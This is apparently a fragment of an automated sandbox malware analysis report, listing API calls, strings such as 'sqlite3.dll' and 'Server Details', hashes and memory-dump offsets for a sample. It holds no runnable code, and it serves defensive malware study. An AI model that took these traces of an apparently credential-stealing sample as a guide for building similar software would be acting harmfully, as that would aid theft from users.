                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                    • String ID: sqlite3.dll
                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                    • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                    • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                    • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: MZ@
                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                    • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                    • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                    • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                    • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString
                                                                                                    • String ID: A4@$Server Details
                                                                                                    • API String ID: 1096422788-4071850762
                                                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 0040849A
                                                                                                    • memset.MSVCRT ref: 004084D2
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,75B4EB20,?,00000000), ref: 0040858F
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,75B4EB20,?,00000000), ref: 004085BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3110682361-0
                                                                                                    • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                    • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3510742995-0
                                                                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8